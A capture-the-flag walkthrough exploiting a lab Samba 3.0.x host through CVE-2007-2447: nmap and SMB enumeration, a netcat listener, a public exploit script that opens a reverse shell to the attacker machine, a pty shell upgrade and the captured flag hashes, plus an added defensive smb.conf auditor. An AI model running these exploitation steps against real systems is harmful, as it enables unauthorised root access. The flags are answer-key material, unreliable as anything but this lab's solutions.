Write-up author: jon-brandy
- First, run nmap against the target host so we can see all open ports and the services running on them.
nmap -p- -sV -O -sVC 10.10.10.3
RESULT
- Notice there are 2 ports that might be serving some type of network share. Not only that, anonymous FTP login is allowed.
- Now let's log in with FTP.
RESULT
- Let's check whether there are any files or directories.
RESULT
- Got nothing.
- Now let's do SMB enumeration.
smbmap -H 10.10.10.3
RESULT
- Notice there are 2 shares that differ from the others -> tmp and opt (no dollar sign).
tmp and opt have no trailing dollar sign, which means they can be accessed with regular user privileges.
- Since tmp is the only share with read and write permissions, tmp is our interest now. The problem is that we don't have any user credentials for this tmp share.
- Even though it shows as open here, we still need user credentials to log in to it.
- Now let's use searchsploit to see whether there is an exploit associated with the version of Samba running on this machine.
searchsploit samba 3.0.2
RESULT
- Based on the first result in the output.
- We could use Metasploit, but let's not use that tool; we want to do this manually. Let's start by finding where this exploit is stored on our Kali Linux and what its CVE number is.
RESULT
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE
- Let's jump to the URL given.
RESULT
- Based on the Samba documentation, we know there is a configuration option which is not enabled by default and which can lead to RCE.
- Anyway, when I searched the CVE number on Google, I found this GitHub repository.
https://github.com/amriunix/CVE-2007-2447
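As an added, defender-side example (not part of the original write-up or the linked repository): a small Python auditor that parses an smb.conf and flags the `username map script` setting behind CVE-2007-2447, together with any share that guest (anonymous) users can write to, which is the tmp share situation seen above. The configuration text, the script path and the share layout are constructed for illustration, not taken from the target.

```python
# Constructed sample smb.conf (not the target's real file): it carries the
# setting behind CVE-2007-2447 plus one share that anonymous users can write to.
SAMPLE_CONF = """\
[global]
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
[opt]
   path = /opt
   guest ok = yes
   read only = yes
"""

def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}; Samba matches parameter
    names case-insensitively, so keys are normalised to lowercase words."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ';#':          # blank or comment line
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif '=' in line and current is not None:
            key, value = (p.strip() for p in line.split('=', 1))
            sections[current][' '.join(key.lower().split())] = value
    return sections

def is_yes(value):
    return value.strip().lower() in ('yes', 'true', '1')   # Samba booleans

def audit_smb_conf(text):
    conf = parse_smb_conf(text)
    findings = []
    if 'username map script' in conf.get('global', {}):
        findings.append('global: "username map script" is set; on unpatched Samba 3.0.x '
                        '(fixed in 3.0.25) this is the command injection of CVE-2007-2447')
    for name, opts in conf.items():
        if name == 'global':
            continue
        guest = is_yes(opts.get('guest ok', opts.get('public', 'no')))
        # "read only" defaults to yes; "writable"/"writeable" are its inverse
        writable = (is_yes(opts.get('writable', opts.get('writeable', 'no')))
                    or opts.get('read only', 'yes').strip().lower() == 'no')
        if guest and writable:
            findings.append(f'[{name}]: guest users can write to {opts.get("path", "?")}')
    return findings
```

Run it against a real /etc/samba/smb.conf with `audit_smb_conf(open('/etc/samba/smb.conf').read())`; an empty list means neither risk is present.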
- Before running the script, start a listener:
nc -nlvp 4444
so we can catch the reverse shell it spawns.
- Next, run this payload:
python3 usermap_script.py 10.10.10.3 139 10.10.14.4 4444
RESULT
- Let's type id and whoami.
RESULT
- We are root, that's great! We don't need privilege escalation to solve this challenge.
- The next thing to do now is to stabilize our shell.
- Let's run this Python command:
python -c 'import pty; pty.spawn("/bin/sh")'
RESULT
- Now let's list all files and directories on the machine.
RESULT
- Jump to the root directory.
INSIDE
- Cat the root.txt file.
RESULT
- Got the flag!
46b24a994e2c264192df7f7c060f1fdd
- Simply go to the home directory, then to makis.
RESULT
- Cat the .txt file.
RESULT
- User owned!
f6b0bf444d16b49c167fffea3e7a9f5a